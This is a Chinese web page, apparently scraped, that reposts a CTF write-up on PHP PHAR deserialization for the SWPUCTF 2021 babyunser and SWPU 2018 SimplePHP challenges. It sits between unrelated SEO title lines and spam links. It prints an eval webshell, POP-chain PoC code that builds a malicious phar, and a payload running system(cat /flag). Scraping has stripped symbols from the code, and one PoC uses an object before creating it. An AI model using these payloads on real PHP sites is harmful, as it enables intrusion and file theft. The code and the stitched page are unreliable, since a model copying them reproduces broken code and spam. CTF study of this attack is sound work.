当前位置: 首页 > news >正文

有域名了也备案了怎么做网站电子商务公司网站设计

有域名了也备案了怎么做网站,电子商务公司网站设计,猎头公司的工作模式不包括,wordpress 友情链接 nofollowPHAR PHAR#xff08;PHP Archive#xff09;文件是一种归档文件格式#xff0c;phar文件本质上是一种压缩文件#xff0c;会以序列化的形式存储用户自定义的meta-data。当受影响的文件操作函数调用phar文件时#xff0c;会自动反序列化meta-data内的内容,这里就是我们反序…PHAR PHARPHP Archive文件是一种归档文件格式phar文件本质上是一种压缩文件会以序列化的形式存储用户自定义的meta-data。当受影响的文件操作函数调用phar文件时会自动反序列化meta-data内的内容,这里就是我们反序列化漏洞的利用点 phar文件的结构 1.a stub可以理解为一个标志格式为xxx?php xxx; __HALT_COMPILER();?前面内容不限但必须以__HALT_COMPILER();来结尾否则phar扩展将无法识别这个文件为phar文件 2.a manifest describing the contentsphar文件本质上是一种压缩文件其中每个被压缩文件的权限、属性等信息都放在这部分。这部分还会以序列化的形式存储用户自定义的meta-data这是上述攻击手法最核心的地方 3.the file contents 被压缩文件的内容 4.[optional] a signature for verifying Phar integrity (phar file format only)签名放在文件末尾将生成的phar文件上传成功后使用phar协议读取文件在使用phar伪协议解析时php一大部分的文件系统函数(下图中的函数)都会将meta-data进行反序列化 phar反序列化利用的条件 phar文件要能够上传到服务器端。要有可用的魔术方法作为“跳板”。文件操作函数的参数可控且:、/、phar等特殊字符没有被过滤 [SWPUCTF 2021 新生赛]babyunser 存在文件上传先上传一个一句话木马看看 发现会被解析为txt文件那么先找找源码看看利用查看文件的功能看看 index.php html titleaa的文件管理器/title body h1aa的文件管理器/h1 a hrefupload.php上传文件/a br br a hrefread.php查看文件/a /body /html upload.php html titleaa的文件上传器/title bodyform action enctypemultipart/form-data methodpostp请选择要上传的文件pinput classinput_file typefile nameupload_file/input classbutton typesubmit namesubmit value上传//form /body /html?phpif(isset($_POST[submit])){$upload_pathupload/.md5(time())..txt;$temp_file $_FILES[upload_file][tmp_name];if (move_uploaded_file($temp_file, $upload_path)) {echo 文件路径.$upload_path;} else {$msg 上传失败;}}read.php ?php include(class.php); $anew aa(); ? ?php error_reporting(0); $filename$_POST[file]; if(!isset($filename)){die(); } $filenew zz($filename); $contents$file-getFile(); ?class.php ?php class aa{public $name;public function __construct(){$this-nameaa;}public function __destruct(){$this-namestrtolower($this-name);} }class ff{private $content;public $func;public function __construct(){$this-content\?php eval(\$_POST[1]);?;}public function __get($key){$this-$key-{$this-func}($_POST[cmd]);} }class zz{public $filename;public $contentsurprise;public function __construct($filename){$this-filename$filename;}public function filter(){if(preg_match(/^\/|php:|data|zip|\.\.\//i,$this-filename)){die(这不合理);}}public function write($var){$filename$this-filename;$lt$this-filename-$var;//此功能废弃不想写了}public function getFile(){$this-filter();$contentsfile_get_contents($this-filename);if(!empty($contents)){return $contents;}else{die(404 not found);}}public function __toString(){$this-{$_POST[method]}($_POST[var]);return $this-content;} }class xx{public $name;public $arg;public function __construct(){$this-nameeval;$this-argphpinfo();;}public function __call($name,$arg){$name($arg[0]);} } 明显存在php反序列化 ,构造poc后生成phar文件将phar文件上传之后再通过post来cat flag ?php class aa{public $name;function __construct(){$this-name new zz();} }class ff{private $content;public $func assert;function __construct(){$this-content new xx();} }class zz{public $filename;public $contentsurprise;function __construct(){$this-filename new ff();}}class xx{public $name;public $arg; }$a new aa(); echo urlencode(serialize($a));# 下面这部分就没改 $phar new Phar(phar.phar); $phar-startBuffering(); $phar-setStub(?php __HALT_COMPILER(); ?); //设置stub$phar-setMetadata($a); //将自定义的meta-data存入manifest $phar-addFromString(test.txt, test); //添加要压缩的文件 //签名自动计算 $phar-stopBuffering(); 生成phar的部分可以直接套用 payload filephar://upload/a5251443346d8ea6c85877d7ef036536.txtmethodwritevarcontentcmdsystem(cat /flag) [SWPU 2018]SimplePHP 查看源码提示flag的位置在flag.php 还存在查看文件的模块看看能不能利用来查看源码 file.php class.php序列化的代码但是给了phar协议的提示 大概率是phar反序列化function.php主要就是限制上传文件的后缀 整理一下思路已知flag在flag.php中但是没有办法直接访问flag.php因为在file.php中限制了只能访问var/www/html下的文件再看序列化的代码不存在unserialize怎么进行反序列化通过phar文件自动触发反序列化通过文件上传触发序列化之后利用file_get_contents来读取flag.php 开始构造pop链 链尾毫无疑问是Test::file_get(),file_get在get中被调用所以触发get就能调用file_get从get开始倒推到链头 _get访问不存在的变量时触发Show::_toString,source是不存在的变量无法调用 在C1e4r中echo可以触发_toStringdestruct在变量摧毁时会自动触发所以就形成完整的pop链C1e4r::_destruct-Show::_toString-Test::file_get() poc $snew Show; $t-params[source]/var/www/html/flag.php; $tnew Test; $s-str[str]$t; $cnew C1e4r; $c-str$s;生成phar文件上传后进入 upload页面拿到文件路径 用phar伪协议读取 ?filephar://upload/643dfaadf749736256e05de9e40b864b.jpg 最后进行base64解码拿到flag
http://www.hkea.cn/news/14307421/

相关文章:

  • 建设网站的建设费用包括哪些内容网站改成响应式
  • 聊天网站站怎么做移动端网站没有icp
  • 镇平微网站建设怎么压缩网站
  • 怎么做音乐网站沈阳男科医院哪家好一些
  • 连云港专业做网站城市分站cms
  • 用摄像头直播网站怎么做做影视网站有什么风险
  • 怎么建国外网站wordpress cg主题
  • 亳州做网站的公司网站建设试用
  • wordpress首页页面seo网站优化排名
  • 哪里可以做寄生虫网站合肥网络科技有限公司做网站
  • 响应式网站视频重庆网站建设公司 菠拿拿
  • 做网站 空间还是服务器展示型网站有哪些内容
  • python 网站开发 环境网站域名的所有权
  • 自助式建网站wordpress用户权限说明
  • 番禺高端网站建设公司wordpress怎么做链接
  • 做网站主机电脑浙江省建设厅干部学校网站
  • 来个网站吧好人一生平安2021公司网站谁负责做
  • win7做本地网站2010年青海省建设厅网站
  • 企业网站外包托管推广建设部注册网站
  • 给个网站最新的2021企业网站怎样优化
  • 做网站开发需要培训吗免费的短视频软件app下载
  • 免费的网站域名和空间福建建设厅网站
  • iis7 asp网站 503公众号开发者有什么用
  • 企业网站建设大概费用免费网络电视直播软件
  • 开一个网站建设公司需要什么哈尔滨网站优化指导
  • 中职 网站建设与管理wordpress本地怎么迁移到服务器
  • 竞品网站分析江苏中益建设官方网站
  • 焦作网站建设服务南宁网站建设电话咨询
  • 专门做团购的网站上上海网站建设设计
  • 国外做地铁设计的公司网站微信公众号和小程序的区别